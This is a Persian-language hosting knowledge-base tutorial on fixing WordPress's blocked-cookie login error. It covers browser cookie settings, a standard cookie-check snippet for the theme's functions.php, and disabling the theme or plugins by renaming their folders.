مسدود شدن کوکی وردپرس و حل مشکل کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند

حال در ادامه به معرفی راهکارهایی برای رفع مشکل مسدود شدن کوکی در وردپرس می‌پردازم که در صورت غیرفعال کردن پروکسی اگر مشکلتون برطرف نشد میتونید از این راهکارها استفاده کرده و موفق به ورود در وردپرس شوید.

راهکار اول: بررسی تنظیمات مرورگر

اولین دلیل این مشکل میتونه به خاطر خطا در کوکی و کش مرورگر باشه که دسترسی به کوکی در سایت مسدود شده. برای این منظور ابتدا کوکی و کش مرورگر خودتون را به صورت کامل پاک کنید. بعد از اینکه کوکی و کش مرورگر مربوط به سایت خودتون را پاک کنید به احتمال زیاد مشکل شما برطرف خواهد شد، در غیر این صورت باید از راهکارهای بعدی استفاده کنید.

اما اگر با پاک کردن کوکی مشکل برطرف نشد باید بررسی کنید ببینید کوکی در مرورگر شما فعال هست یا خیر، برای این منظور هم میتونید در دو مرورگر فایرفاکس و گوگل کروم به شکل زیر عمل کنید.

فعال کردن کوکی در گوگل کروم

برای فعال کردن کوکی در مرورگر گوگل کروم روی علامت سه نقطه که در گوشه مرورگر قرار داره کلیک کنید تا تصویر زیر براتون نمایش داده بشه.

مسدود شدن کوکی وردپرس و حل مشکل کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند

سپس از منوی باز شده گزینه Settings را انتخاب کنید و در نهایت در بالای صفحه در باکس جستجو عبارت content را جستجو کنید تا مثل تصویر زیر گزینه Cookie نمایش داده بشه یا اینکه مستقیما آدرس chrome://settings/content را وارد کنید تا به این صفحه هدایت شوید.

مسدود شدن کوکی وردپرس و حل مشکل کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند

بعد از کلیک روی این گزینه صفحه‌ای مشابه تصویر زیر براتون باز میشه که باید به پایین صفحه اسکرول کرده و در بخش Allow روی دکمه ADD کلیک کنید.

مسدود شدن کوکی وردپرس و حل مشکل کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند

بعد از کلیک روی دکمه ADD باکس زیر براتون باز میشه که باید آدرس سایت خودتون را مشابه نمونه در این باکس وارد کرده و روی دکمه ADD کلیک کنید. بعد از ذخیره این گزینه دسترسی به کوکی فعال خواهد شد و مشکلتون را میتونید برطرف کنید.

مسدود شدن کوکی وردپرس و حل مشکل کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند

فعال کردن کوکی در فایرفاکس

برای فعال کردن کوکی در مرورگر فایرفاکس روی علامت منو که در گوشه مرورگر قرار داره کلیک کنید تا تصویر زیر براتون نمایش داده بشه و گزینه Options را انتخاب کنید.

مسدود شدن کوکی وردپرس و حل مشکل کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند

بعد از این مرحله وارد صفحه زیر میشید که باید در اون به بخش Privacy & Security اسکرول کنید و سپس روی دکمه Exceptions کلیک کنید.

مسدود شدن کوکی وردپرس و حل مشکل کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند

بعد از کلیک روی این دکمه پنجره زیر براتون باز میشه که باید در اون آدرس دامنه خودتون را وارد کرده و روی دکمه Allow کلیک کنید تا به لیست اضافه بشه و بعد از اینکه اضافه شد در نهایت روی دکمه Save Changes کلیک کنید.

مسدود شدن کوکی وردپرس و حل مشکل کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند

راهکار دوم: افزودن کد به فانکشن قالب

گاهی اوقات پیش میاد که خطای کوکی به دلیل خطا در فایل فانکشن قالب هست. برای این کار باید وارد هاست خودتون شده و روی گزینه File Manager کلیک کنید تا به صفحه مدیریت فایل‌ها در هاست هدایت شوید.

مسدود شدن کوکی وردپرس و حل مشکل کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند

حالا به مسیر public_html/wp-content/themes مراجعه کرده و وارد پوشه‌ای از قالب سایت که در حال استفاده از اون هستید بشید. در این پوشه فایلی با نام functions.php قرار داره که با راست کلیک کردن روی فایل و انتخاب گزینه EDIT میتونید به صفحه ویرایش فایل هدایت شوید. بعد از اینکه صفحه ویرایشگر فایل باز شد کدهای زیر را در انتهای فایل فانکشن قرار داده و ذخیره کنید.

setcookie(TEST_COOKIE, 'WP Cookie check', 0, COOKIEPATH, COOKIE_DOMAIN);
if ( SITECOOKIEPATH != COOKIEPATH ) setcookie(TEST_COOKIE, 'WP Cookie check', 0, SITECOOKIEPATH, COOKIE_DOMAIN);

بعد از قرار دادن کد مجددا وارد صفحه ورود در وردپرش شده و سعی کنید با نام کاربری و رمز عبور خودتون به وردپرس لاگین کنید. در صورتی که مشکل برنامه نویسی باشه میتونید وارد پیشخوان شوید.

دقت کنید قبل از هرگونه تغییر در ساختار فایل فانکشن قالب وردپرس و اضافه کردن هر کدی ابتدا یک نسخه پشتیبان از اون را به صورت کپی شده دریافت کنید و سپس کدهای بالا را به فایل اضافه کنید تا در صورت وارد کردن اشتباه کد بتونید با جایگزین کردن نسخه قبلی مشکل را برطرف کنید.

راهکار سوم: غیرفعال کردن پوسته

برای اینکار کافیه وارد File Manager هاست خودتون شده و سپس به مسیر public_html/wp-content/themes مراجعه کنید. حالا نام پوشه قالبی که در حال استفاده از اون هستید را باید تغییر نام بدین. برای این منظور روی پوشه رایت کلیک کرده و بعد از انتخاب گزینه Rename میتونید اسم پوشه را با اضافه کردن یک عدد یا هر کاراکتر دیگه به انتهای اون، به نام دلخواه تغییر بدین. بعد از تغییر نام پوشه قالب، قالب غیرفعال شده و یکی از قالب‌های پیشفرض وردپرس فعال خواهد شد. حالا اگر مشکل از قالب باشه میتونید با مراجعه به صفحه ورود وردپرس به پیشخوان وردپرس وارد شوید.

راهکار چهارم: غیرفعال کردن افزونه‌های وردپرس

برای اینکار کافیه وارد File Manager هاست خودتون شده و سپس به مسیر public_html/wp-content مراجعه کنید. حالا پوشه plugins را به یک نام دلخواه دیگه مثل plugins-old تغییر داده و ذخیره کنید. برای این کار روی پوشه راست کلیک کرده و گزینه Rename را انتخاب کنید.

مسدود شدن کوکی وردپرس و حل مشکل کوکی ها به خاطر خروجی غیرمنتظره مسدود هستند

بعد از تغییر پوشه کلیه افزونه‌های وردپرس غیرفعال خواهند شد که حالا باید مجددا اسم پوشه را با رایت کلیک کردن و انتخاب گزینه Rename به plugins تغییر نام بدین تا مشکل برطرف شده و بعد از اینکه وارد پیشخوان وردپرس شدید افزونه‌ها را فعال کنید.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از اون تونسته باشید مشکل مسدود بودن کوکی در وردپرس هنگام ورود به پیشخوان وردپرس را برطرف کنید. در صورتی که در رابطه با این آموزش سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش رفع مشکل مسدود شدن کوکی در وردپرس اولین بار در پایگاه دانش میزبان‌فا پدیدار شد.

Viewing all 383 articles
Browse latest View live




Latest Images